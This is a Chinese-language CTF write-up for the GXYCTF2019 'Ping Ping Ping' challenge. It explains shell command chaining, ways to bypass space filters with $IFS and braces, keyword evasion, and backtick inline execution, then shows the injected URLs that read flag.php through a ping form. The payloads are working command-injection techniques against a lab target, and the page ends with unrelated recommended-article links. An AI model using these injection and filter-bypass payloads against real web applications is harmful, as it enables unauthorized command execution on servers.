web——[GXYCTF2019]Ping Ping Ping1——过滤和绕过

0x00 考点

0、命令联合执行

; 前面的执行完执行后面的

| 管道符,上一条命令的输出,作为下一条命令的参数(显示后面的执行结果)

|| 当前面的执行出错时(为假)执行后面的

& 将任务置于后台执行

&& 前面的语句为假则直接出错,后面的也不执行,前面只能为真

%0a (换行)

%0d (回车)

1、命令绕过空格方法有:

{IFS}9

{IFS}

$IFS

${IFS}

IFS1 //1改成加其他数字貌似都行

IFS

<

<>

{cat,flag.php} //用逗号实现了空格功能,需要用{}括起来

%20 (space)

%09 (tab)

X='cat\\x09./flag.php';X (\x09表示tab,也可以用\x20)

ps:有时会禁用cat:

解决方法是使用tac反向输出命令:

linux命令中可以加\,所以甚至可以ca\t /fl\ag

2、内联执行

内联,就是将反引号内命令的输出作为输入执行

?ip=127.0.0.1;catIFS9`ls`

$IFS在Linux下表示为空格

9是当前系统shell进程第九个参数持有者,始终为空字符串,后可以接任意数字

这里IFS9或IFS垂直,后面加个与{}类似,起截断作用

原文链接:https://blog.csdn.net/vanarrow/article/details/108295481

这个题先ping一下,可以ping通,直接ls看看

0ef4f16b-2de2-41d3-bfcf-6d06f7a9fb60.node5.buuoj.cn:81/?ip=127.0.0.1;ls

然后cat一下flag.php看看

wc,它骂我,额,,,是空格的过滤

0ef4f16b-2de2-41d3-bfcf-6d06f7a9fb60.node5.buuoj.cn:81/?ip=127.0.0.1;cat{IFS}flag.php

也过滤了{},用$IFS$1代替

flag.php里没有东西

在index.php里找找

代码审计

过滤了许多的字符

1.源码中有一个$a可以覆盖

?ip=127.0.0.1;a=f;catIFS1$alag.php 过滤

?ip=127.0.0.1;a=l;catIFS1f$aag.php 没flag

?ip=127.0.0.1;a=a;catIFS1fl$ag.php 过滤

?ip=127.0.0.1;a=g;catIFS1fla$a.php 有flag

?ip=127.0.0.1;a=fl;b=ag;catIFS1ab.php 过滤

?ip=127.0.0.1;b=ag;a=fl;catIFS1ab.php 有flag

使用ctrl+u查看源码

、变量ab互换传递,绕过字符串匹配,实现拼接

复制代码
?ip=127.0.0.1;b=ag;a=fl;cat$IFS$1$a$b.php

?ip=127.0.0.1;b=lag;a=f;cat$IFS$a$b.php
相关推荐
申君健248641827720235 分钟前
Vapor 核心数据结构:Block原理
前端
Csvn43 分钟前
工程化专题 | 改完组件保存,浏览器毫无反应,重启 dev server 又好了——气不气?
前端
我有满天星辰1 小时前
Vue 指令完全指南:从 Vue 2 到 Vue 3 的演进与实战
前端·javascript·vue.js
光影少年1 小时前
RN 渲染原理:不依赖WebView,原生控件渲染
前端·react native·react.js·前端框架
小白学过的代码1 小时前
# flv.js / mpegts.js 播不了国标摄像头(H.265 + G.711A)?纯前端 Jessibuca 无后端方案(附完整代码)
前端·javascript·h.265
console.log('npc')1 小时前
AI Agent 前端流式渲染核心技术文档(SSE \+ WebSocket \+ 打字机渲染)
前端·人工智能·websocket
法外狂徒11 小时前
将 Pi Agent 接入 HagiCode 的实践之路
服务器·前端·人工智能
IT_陈寒2 小时前
React中useEffect的依赖项把我坑惨了
前端·人工智能·后端
广州华水科技2 小时前
单北斗GNSS在变形监测中的优势与应用分析
前端
程序员爱钓鱼3 小时前
Rust 变量与不可变性:为什么默认不能修改变量?
前端·后端·rust